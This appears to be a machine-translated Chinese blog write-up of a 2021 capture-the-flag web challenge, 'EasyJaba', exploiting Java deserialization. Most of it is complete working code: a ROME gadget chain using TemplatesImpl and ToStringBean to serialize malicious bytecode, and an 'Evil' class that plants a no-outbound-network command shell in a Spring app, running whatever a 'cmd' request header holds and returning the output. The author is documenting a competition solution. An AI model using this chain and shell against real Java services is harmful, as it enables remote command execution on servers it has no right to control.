当前位置:网站首页>Longyuan war "epidemic" 2021 network security competition web easyjaba
Longyuan war "epidemic" 2021 network security competition web easyjaba
2022-07-05 04:02:00 【Sk1y】
Longyuan war " Epidemic disease "2021 Cyber security competition Web EasyJaba
List of articles
View source code , Some classes are disabled
( Let's talk about the decompiler , I used it all the time jd-gui, But the attachment of this topic , Use jd-gui, Unable to see the disabled information , as follows ; And the screenshot above , It's using jdax1.4)
At the same time, it is found that rome1.0, So it's used rome1.0 That chain
HashMap Class is used to trigger hashCode, and BadAttributeValueExpException Class is used to trigger toString, Look at the source code of this topic , You can directly call object.toString, You don't need an entry class
Rewrite it rome chain
package Rome;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;
import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;
public class Rome2 {
public static void unserialize(byte[] bytes) throws Exception{
ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
ObjectInputStream oin = new ObjectInputStream(bain);
oin.readObject();
}
public static byte[] serialize(Object o) throws Exception{
try(ByteArrayOutputStream baout = new ByteArrayOutputStream();
ObjectOutputStream oout = new ObjectOutputStream(baout)){
oout.writeObject(o);
return baout.toByteArray();
}
}
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
public static void main(String[] args) throws Exception {
// Malicious bytecode
byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\cc1\\src\\main\\java\\Rome\\Evil.class"));
// byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\test\\target\\classes\\calc1.class"));
TemplatesImpl templates = new TemplatesImpl();
setFieldValue(templates,"_name","sk1y"); // Cannot be set to null, Or return to null
setFieldValue(templates,"_class",null);
setFieldValue(templates,"_bytecodes",new byte[][]{
code});
setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
ToStringBean toStringBean = new ToStringBean(Templates.class,templates);
// toStringBean.toString();
byte[] aaa = serialize(toStringBean);
System.out.println(Base64.getEncoder().encodeToString(aaa));
}
}
Not out of the network
Because the problem can't be solved , So it uses what is circulated on the Internet spring Malicious classes loaded without going out of the network
package Rome;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.lang.reflect.Method;
import java.util.Scanner;
public class Evil extends AbstractTranslet
{
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
public Evil() throws Exception{
Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
Method m = c.getMethod("getRequestAttributes");
Object o = m.invoke(null);
c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
m = c.getMethod("getResponse");
Method m1 = c.getMethod("getRequest");
Object resp = m.invoke(o);
Object req = m1.invoke(o); // HttpServletRequest
Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
getHeader.setAccessible(true);
getWriter.setAccessible(true);
Object writer = getWriter.invoke(resp);
String cmd = (String)getHeader.invoke(req, "cmd");
String[] commands = new String[3];
String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
commands[0] = "cmd";
commands[1] = "/c";
} else {
commands[0] = "/bin/sh";
commands[1] = "-c";
}
commands[2] = cmd;
writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
writer.getClass().getDeclaredMethod("flush").invoke(writer);
writer.getClass().getDeclaredMethod("close").invoke(writer);
}
}
javac Compile to Evil.class, Load this malicious class
The final effect
see fmyyy Master's wp, You can actually use Hashtable Replace HashMap, Can also trigger hashCode, The original chain can be opened ( I didn't succeed , What should be the problem ), The specific links are placed below
Reference link
边栏推荐
- provide/inject
- grandMA2 onPC 3.1.2.5的DMX参数摸索
- Summary of scene design
- Uni app common functions /api
- JVM garbage collection
- 特殊版:SpreadJS v15.1 VS SpreadJS v15.0
- Possible stack order of stack order with length n
- The new project Galaxy token just announced by coinlist is gal
- Phpmailer reported an error: SMTP error: failed to connect to server: (0)
- 【刷题】BFS题目精选
猜你喜欢
JVM garbage collection
Containerd series - detailed explanation of plugins
ABP vNext microservice architecture detailed tutorial - distributed permission framework (Part 1)
北京程序员的真实一天!!!!!
Threejs realizes the drawing of the earth, geographical location annotation, longitude and latitude conversion of world coordinates threejs coordinates
About the recent experience of writing questions
CTF stegano practice stegano 9
UI自動化測試從此告別手動下載瀏覽器驅動
grandMA2 onPC 3.1.2.5的DMX参数摸索
It took two nights to get Wu Enda's machine learning course certificate from Stanford University
随机推荐
根据入栈顺序判断出栈顺序是否合理
Differences among 10 addressing modes
25K 入职腾讯的那天,我特么哭了
长度为n的入栈顺序的可能出栈顺序种数
UI自動化測試從此告別手動下載瀏覽器驅動
技术教程:如何利用EasyDSS将直播流推到七牛云?
Containerd series - detailed explanation of plugins
ActiveReportsJS 3.1 VS ActiveReportsJS 3.0
[software reverse analysis tool] disassembly and decompilation tool
[vérification sur le Web - divulgation du code source] obtenir la méthode du code source et utiliser des outils
Special Edition: spreadjs v15.1 vs spreadjs v15.0
陇原战“疫“2021网络安全大赛 Web EasyJaba
Timing manager based on C #
Interview summary: This is a comprehensive & detailed Android interview guide
[software reverse - basic knowledge] analysis method, assembly instruction architecture
kubernetes集群之调度系统
Three level linkage demo of uniapp uview u-picker components
反絮凝剂-氨碘肽滴眼液
3. Package the bottom navigation tabbar
The new project Galaxy token just announced by coinlist is gal